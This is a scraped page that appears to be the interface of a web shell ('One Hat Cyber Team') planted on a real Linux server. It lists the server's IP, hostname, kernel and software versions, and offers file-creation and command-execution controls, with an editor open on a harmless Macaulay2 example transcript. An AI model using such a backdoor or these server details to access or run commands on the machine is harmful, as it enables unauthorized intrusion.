One Hat Cyber Team
Your IP :
216.73.216.80
Server IP :
194.44.31.54
Server :
Linux zen.imath.kiev.ua 4.18.0-553.77.1.el8_10.x86_64 #1 SMP Fri Oct 3 14:30:23 UTC 2025 x86_64
Server Software :
Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1k
PHP Version :
5.6.40
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
Macaulay2
/
Python
/
examples
/
Edit File:
___Python__Object.out
-- -*- M2-comint -*- hash: 10348206706567645224 i1 : x = pythonValue "5" o1 = 5 o1 : PythonObject of class int i2 : y = pythonValue "2" o2 = 2 o2 : PythonObject of class int i3 : x + y o3 = 7 o3 : PythonObject of class int i4 : x - y o4 = 3 o4 : PythonObject of class int i5 : x * y o5 = 10 o5 : PythonObject of class int i6 : x / y o6 = 2.5 o6 : PythonObject of class float i7 : x > y o7 = true i8 : x == y o8 = false i9 : x + 2 o9 = 7 o9 : PythonObject of class int i10 :
Simpan